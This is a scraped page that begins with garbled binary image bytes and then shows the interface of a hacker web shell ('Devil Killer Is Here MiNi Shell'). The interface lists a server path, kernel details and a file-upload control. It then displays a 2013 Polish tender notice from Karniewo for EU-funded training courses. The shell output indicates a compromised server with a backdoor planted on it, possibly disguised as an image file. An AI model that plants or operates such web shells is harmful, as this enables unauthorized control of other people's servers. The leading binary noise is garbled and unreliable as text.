JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130904/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130904/358478-N-2013.html

<p class="kh_header"><b>Karniewo: Organizacja i przeprowadzenie kursów dla Gminnego Ośrodka Pomocy Społecznej w Karniewie w ramach projektu pt: Kobiety myślą o jutrze współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego</b><br>
<b>Numer ogłoszenia: 358478 - 2013; data zamieszczenia: 04.09.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gminny Ośrodek Pomocy Społecznej w Karniewie , ul. Pułtuska 5, 06-425 Karniewo, woj. mazowieckie, tel. 29 767 04 21, faks 29 767 04 22.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.karniewo.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja i przeprowadzenie kursów dla Gminnego Ośrodka Pomocy Społecznej w Karniewie w ramach projektu pt: Kobiety myślą o jutrze współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie 1. Warsztaty grupowe kompetencji i umiejętności społecznych z zakresu komunikacji o autoprezentacji oraz zajęcia ze stereotypów i dyskryminacji
Ilość osób	9 osób
Ilość godzin dydaktycznych (1 godz.= 45min)- 16 godzin 
Dojazd do miejsca realizacji kursu	Cena dojazdu beneficjentów do miejsca realizacji warsztatu powinna być wkalkulowana w cenę ofertową
Termin zajęć 	IX-2013 do XI-2013r.
Zadanie 2: Warsztaty grupowe z doradcą zawodowym
Ilość osób	9 osób
Ilość godzin dydaktycznych 
(1 godz.= 45min)	16 godzin 
Dojazd do miejsca realizacji kursu	Cena dojazdu beneficjentów do miejsca realizacji kursu powinna być
wkalkulowana w cenę ofertową
Termin zajęć	IX - 2013r. do XI - 2013 r.
Zadanie 3: Profesjonalny sprzedawca
Ilość osób 	9 osób
Ilość godzin dydaktycznych                      (1 godzina= 45min)	160 godzin w tym: 90 godzin zajęć teoretycznych i 70 godzin zajęć praktycznych.
Dojazd do miejsca realizacji kursu	Cena dojazdu beneficjenta do miejsca realizacji kursu powinna być wkalkulowana w cenę ofertową
Termin zajęć	IX - 2013r. do XI -2013 r.
Zadanie: Prawo jazdy kat. B
Ilość osób	4 osoby
Ilość godzin dydaktycznych    (1 godzina= 45min)	60 godzin w tym: 30 godzin zajęć teoretycznych  i 30 godzin zajęć  praktycznych.
Dojazd do miejsca realizacji kursu	Cena dojazdu beneficjentów do miejsca realizacji kursu powinna być
wkalkulowana w cenę ofertową
Termin zajęć	IX - 2013r. do XI - 2013 r..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.51.00.00-2, 80.57.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. W celu potwierdzenia tego warunku Wykonawca złoży stosowne oświadczenie. Wzór oświadczenia stanowi załącznik do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. W celu potwierdzenia tego warunku Wykonawca złoży stosowne oświadczenie. Wzór oświadczenia stanowi załącznik do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. W celu potwierdzenia tego warunku Wykonawca złoży stosowne oświadczenie. Wzór oświadczenia stanowi załącznik do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. W celu potwierdzenia tego warunku Wykonawca złoży stosowne oświadczenie. Wzór oświadczenia stanowi załącznik do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. W celu potwierdzenia tego warunku Wykonawca złoży stosowne oświadczenie. Wzór oświadczenia stanowi załącznik do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Doświadczenie - 20</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość zmian do umowy w tym przedłużenia terminu realizacji zamówienia tylko w przypadku wystąpienia okoliczności, które nie wynikają z winy Wykonawcy. Zmiany treści i warunków umowy mogą nastąpić również w przypadku wystąpienia: 1) wady lub zmiany w przedmiocie programu realizacji o czas niezbędny dla dostosowania się Wykonawcy do takiej zmiany, 2) zawieszenia przez Zamawiającego wykonywania usługi, 3) zmian w przedmiocie programu w wyniku zmian przepisów prawa, 4) rezygnacji z części usługi przez Zamawiającego/wprowadzenie usług zamiennych, jeżeli będzie to niezbędne dla prawidłowej realizacji przedmiotu umowy, Gdy konieczność wprowadzenia zmian będzie następstwem zmian wprowadzonych w Umowach pomiędzy Zamawiającym, a inną niż Wykonawca stroną, w szczególności instytucją Wdrażającą a także innymi instytucjami, które na podstawie przepisów prawa mogą wpływać na realizację zamówienia. Gdy konieczność wprowadzenia zmian będzie następstwem zmian wytycznych dotyczących POKL. Każdorazowo wniosek o zmianę umowy składany przez Wykonawcę Zamawiającego musi wpłynąć do Zamawiającego Wykonawcy w formie pisemnej w terminie minimum 7 dni przed planowanym wprowadzeniem zmian. We wniosku o zmianę warunków umowy należy podać czego zmiana dotyczy, dlaczego jest konieczna oraz proponowany termin wprowadzenia zmiany.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.karniewo.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gminny Ośrodek Pomocy Społecznej, ul. Pułtuska 5, 06-425 Karniewo.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.09.2013 godzina 10:45, miejsce: Gminny Ośrodek Pomocy Społecznej, ul. Pułtuska 5, 06-425 Karniewo.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> PROGRAM OPERACYJNY - KAPITAŁ LUDZKI 
Tytuł projektu - Kobiety myślą o jutrze
Priorytet VII. Promocja integracji społecznej 
Działanie 7.1. Rozwój i upowszechnienie aktywnej integracji  
Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez Ośrodki Pomocy Społecznej.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Warsztaty grupowe kompetencji i umiejętności społecznych z zakresu komunikacji o autoprezentacji oraz zajęcia ze stereotypów i dyskryminacji.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ilość osób	9 osób
Ilość godzin dydaktycznych (1 godz.= 45min)	16 godzin 
Dojazd do miejsca realizacji kursu	Cena dojazdu beneficjentów do miejsca realizacji warsztatu powinna być wkalkulowana w cenę ofertową
Termin zajęć 	IX-2013 do XI-2013r.
Program powinien zawierać
wskazane poniżej minimum
programowe	Rozwijanie umiejętności interpersonalnych - komunikacja interpersonalna:
- komunikacja werbalna i niewerbalna
- bariery komunikacyjne, rodzaje barier w komunikacji pozawerbalnej
- bariery w komunikacji słownej oraz sposoby ich pokonywania
- rola i znaczenie aktywnego słuchania w kontakcie
- rozwijanie umiejętności asertywnych 
- autoprezentacja- przygotowanie się do rozmowy z pracodawcą
Budowa poczucia własnej wartości:
- podniesienie umiejętności samooceny, wiary w siebie
- rozwijanie umiejętności autoprezentacyjnych 
- kierowanie własnym rozwojem, zaplanowanie zmian
Wzbudzanie motywacji do zmiany:
- przełamywanie poczucia wyuczonej bezradności
- zmiana jako zagrożenie i rozwój
- stawianie sobie realistycznych życiowych celów w oparciu o indywidualne potrzeby, zainteresowania, zdolności oraz posiadane zasoby - indywidualne możliwości,
- poszukiwanie możliwości osiągnięcia celów
Dyskryminacja:
- stworzenie bezpiecznej przestrzeni dla wszystkich,
- refleksja nad własną postawą,
- kształtowanie postaw tolerancji
Materiały szkoleniowe	Każdy uczestnik warsztatu musi mieć zapewnione przez Wykonawcę wszystkie niezbędne materiały i narzędzia do odbycia warsztatu (wszystkie materiały dla beneficjentów muszą zawierać logotypy) oraz musi otrzymać na własność: program warsztatu i harmonogram zajęć, materiały szkoleniowe zgodne z tematyką warsztatu (jeden komplet dla Zamawiającego na potrzeby dokumentacji projektowej) oraz materiały biurowe (teczka papierowa formatu A4, zeszyt i długopis)
Usługa gastronomiczna	Wykonawca musi zapewnić podczas zajęć na warsztatach barek kawowy oraz obiad jednodaniowy dla każdego uczestnika warsztatu. 
Warunki szkolenia	Wykonawca prowadzi dokumentację z  zajęć w tym : dziennika zajęć, listy obecności uczestnika szkolenia, listy potwierdzającej korzystanie uczestnika szkolenia z posiłków, listy potwierdzającej odbiór materiałów dydaktycznych i piśmienniczych, list potwierdzającej odbiór zaświadczeń o ukończeniu i uczestnictwie w szkoleniu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.51.00.00-2, 80.57.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Doświadczenie - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Warsztaty grupowe z doradcą zawodowym.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ilość osób	9 osób
Ilość godzin dydaktycznych 
(1 godz.= 45min)	16 godzin 
Dojazd do miejsca realizacji kursu	Cena dojazdu beneficjentów do miejsca realizacji kursu powinna być
wkalkulowana w cenę ofertową
Termin zajęć	IX - 2013r. do XI - 2013 r.
Program powinien zawierać wskazane poniżej minimum programowe	Rozpoznanie własnych możliwości zawodowych - samopoznanie
- umiejętność rozpoznania własnych potrzeb
- zapoznanie się z zawodami zgodnymi z predyspozycjami
- zwiększenie motywacji do podjęcia pracy
- przygotowanie do rozmowy z pracodawcą - autoprezentacja na rynku pracy
Sporządzanie dokumentów aplikacyjnych
- umiejętność określenia informacji w dokumentach aplikacyjnych
- elementy składowe listu motywacyjnego i CV 
Metody efektywnego poszukiwania pracy
- umiejętność wyszukiwania informacji o wolnych miejscach pracy
- kształtowanie umiejętności napisania własnego ogłoszenia prasowego o poszukiwaniu pracy
- korzystanie z usług instytucji pomagających znaleźć pracę
- analiza rynku pracy (lokalnego, krajowego, globalnego)
- poznanie metod poszukiwania pracy
Materiały szkoleniowe	Każdy uczestnik warsztatu musi mieć zapewnione przez Wykonawcę wszystkie niezbędne materiały i narzędzia do odbycia warsztatu (wszystkie materiały dla beneficjentów musza zawierać logotypy) oraz musi otrzymać na własność: program warsztatu i harmonogram zajęć, materiały szkoleniowe zgodne z tematyką kursu (jeden komplet dla Zamawiającego na potrzeby dokumentacji projektowej) oraz materiały
biurowe (teczka papierowa formatu A4, zeszyt i długopis)
Usługa gastronomiczna	Wykonawca musi zapewnić podczas zajęć teoretycznych na warsztatach barek kawowy oraz obiad jednodaniowy dla każdego uczestnika warsztatu. 
Warunki szkolenia
	Wykonawca prowadzi dokumentację z  zajęć w tym : dziennika zajęć, listy obecności uczestnika szkolenia, listy potwierdzającej korzystanie uczestnika szkolenia z posiłków, listy potwierdzającej odbiór materiałów dydaktycznych i piśmienniczych, list potwierdzającej odbiór zaświadczeń o ukończeniu i uczestnictwie w szkoleniu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.51.00.00-2, 80.57.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Doświadczenie - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Profesjonalny sprzedawca.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ilość osób 	9 osób
Ilość godzin dydaktycznych                      (1 godzina= 45min)	160 godzin w tym: 90 godzin zajęć teoretycznych i 70 godzin zajęć praktycznych.
Dojazd do miejsca realizacji kursu	Cena dojazdu beneficjenta do miejsca realizacji kursu powinna być wkalkulowana w cenę ofertową
Termin zajęć	IX - 2013r. do XI -2013 r.
Program
powinien zawierać
wskazane poniżej
minimum programowe	Wykonawca zrealizuje kurs w oparciu o program szkolenia spełniający zasady i warunki podnoszenia kwalifikacji zawodowych i wykształcenia ogólnego osób dorosłych, a także spełniający określone dla tych zawodów standardy kwalifikacji i szkolenia.

Obsługi urządzeń fiskalnych
Wykorzystania komputera w sklepie
Sporządzania dokumentacji handlowej
Organizacji pracy w sklepie, jego wystroju, zaopatrzenia i sprzedaży towarów 
Znajomości przepisów dotyczących reklamacji i gwarancji towarowych, 
Wiedzy na temat, dostosowania asortymentu do warunków rynku, form sprzedaży detalicznej
Wykonywania czynności rachunkowo-kasowych
Znajomości zasad przechowywania towarów, ich klasyfikacji, normalizacji i certyfikacji
Dysponowania podstawowymi wiadomościami z dziedziny marketingu, promocji i reklamy.

Kultura obsługi klienta 
1.	Standardy obsługi klienta
2.	Formy pomocy klientowi
3.	Zasady tworzenia dobrych relacji miedzy obsługującym a klientem
4.	Obsługa klienta w sytuacjach konfliktowych - zwroty, skargi, reklamacje

Handel detaliczny, organizacja i technika handlu 
1.	Sztuka sprzedawania - zachowania konsumenckie, charakterystyka grup konsumenckich, przebieg i warunki sprzedaży 
2.	Towar jako przedmiot handlu - asortyment, źródła zakupu, wybór dostawcy, 
3.	Zamawianie towarów, reklamacje ilościowe, jakościowe, terminowe, transportowe
4.	Elementy właściwej organizacji pracy
5.	Formy płatności: gotówka, czek, przelew, karta kredytowa
6.	Funkcje i formy handlu detalicznego i hurtowego
7.	Lokalizacja i wyposażenie placówki handlowej
8.	Dokumentacja handlowa i magazynowa 

Podstawowe zasady rachunkowości i kontroli placówek handlowych 
1.	Istota, funkcje i zasady rachunkowości
2.	Aktywa trwałe i obrotowe
3.	Źródła finansowania zasobów 
4.	Klasyfikacja zasobów majątkowych, kapitałów i zobowiązań jednostek gospodarczych
5.	Zestawienia obrotów i sald
6.	Dokumentacja księgowa - dokumenty księgowe i ich zadania, klasyfikacja dokumentów księgowych, obieg i archiwizowanie dokumentów
7.	Wybrane zagadnienia z ewidencji księgowej - rozliczenia gotówkowe i bezgotówkowe, ewidencja zakupu materiałów i towarów z uwzględnieniem VAT, ewidencja rozchodu materiałów, ewidencja sprzedaży wyrobów i towarów.
8.	Podatki i ich charakterystyka 

Podstawy towaroznawstwa 
1.	Oznakowanie towarów. Klasyfikacja rodzajowa i systematyka towarów. Normy. 
2.	Właściwości towarów i czynniki wpływające na ich jakość
3.	Przechowywanie towarów. Zasady konserwacji i przechowywania produktów spożywczych i nieżywnościowych.
4.	Opakowania. Funkcje. Znaki na opakowaniach 
5.	Ochrona jakości w transporcie 

Elementy marketingu 
1.	Czynniki tworzące wizerunek firmy na rynku
2.	Identyfikacja wizualna
3.	Pracownicy wizytówką firmy
4.	Promocja

Znaki pieniężne 
1.	Funkcje i cechy pieniądza
2.	Rozpoznawanie i kontrola znaków pieniężnych
3.	Zabezpieczenia

Elementy prawa 
1.	Podstawowe pojęcia prawne
2.	Zdolność prawna i zdolność do czynności prawnych
3.	Podstawy prawne prowadzenia działalności gospodarczej
4.	Umowy w działalności gospodarczej
5.	Odpowiedzialność materialna pracowników

Obsługa urządzeń fiskalnych i innych urządzeń sklepowych
1.	Przepisy regulujące zastosowanie kas fiskalnych i innych urządzeń sklepowych w placówkach handlowych.
2.	Obowiązki podatników stosujących kasy fiskalne i terminale płatnicze
3.	Programowanie kas fiskalnych
4.	Transmisja danych z kas fiskalnych do programów magazynowych i księgowych
5.	Uzyskiwanie raportów kasowych
6.	Ćwiczenia praktyczne z zastosowania kas fiskalnych 

Techniki komputerowe w handlu 
1.	Obsługa programu magazynowo - zaopatrzeniowo - sprzedażowego Handel - Symfonia
2.	Obsługa programu WORD, EXEL, Faktury Comarch OPT!MA

Bezpieczeństwo i higiena w zakładzie pracy
1.	BHP na stanowisku pracy
2.	Minimum sanitarne

Udzielanie Pierwszej pomocy w miejscu pracy

Spotkanie z Rzecznikiem Praw Konsumenta
Zaświadczenia/certyfikaty

	Na potwierdzenie zdobytych kwalifikacji uczestnik otrzymuje świadectwo egzaminu kwalifikacyjnego (certyfikat). Wykonawca wyda uczestnikowi, który ukończy szkolenie zaświadczenie informujące o uczestnictwie w szkoleniu współfinansowanym ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, oznakowanych zgodnie z wytycznymi dotyczącymi oznakowywania projektów w ramach POKL 2007-2013. Treść zaświadczenia zostanie uzgodniona z Zamawiającym.
